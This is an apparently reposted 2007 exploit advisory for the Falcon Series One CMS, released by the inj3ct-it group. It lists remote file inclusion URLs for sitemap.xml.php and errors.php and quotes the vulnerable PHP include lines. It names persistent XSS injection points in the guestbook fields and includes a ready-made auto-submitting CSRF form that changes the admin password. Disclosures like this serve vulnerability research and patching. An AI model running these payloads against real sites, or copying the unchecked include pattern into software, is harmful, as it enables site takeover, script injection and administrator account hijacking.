--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Multilple Remote File Inclusion - Permanent Xss --------------------------------------------------------------- # Author: MhZ91 # Title: Falcon Series One - Multilple Remote File Inclusion + Permanent Xss # Download: http://sourceforge.net/projects/falconcms/ # Bug: Multilple Remote File Inclusion + Permanent Xss # Severity: High # Visit: http://www.inj3ct-it.org --------------------------------------------------------------- Exploit: http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code] Vuln code: @include_once ($dir['classes']."class.pages.php"); --------------------------------------------------------------- Exploit: http://[site]/errors.php?error=[Evil_Code] Vuln code: <?include($_REQUEST["error"] . "/errors.php");?> --------------------------------------------------------------- Permanent Xss at http://[site]/index.php?guestbook=v in the input gb_mail, gb_name and textarea gb_text your [Xss] and after the xss work here index.php?guestbook=v :p --------------------------------------------------------------- Simple 1337 Csrf exploit: <form name="form_change" action="http://[site]/index.php?admin=changepass" method="post"> <input type="hidden" name="f_pass" class="field" value="[YourPWD]" /> <input type="hidden" name="f_pass2" class="field" value="[YourPWD]" /> </form><script>document.form_change.submit()</script> There is other more csrf and permanent xss.. # milw0rm.com [2007-12-10]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论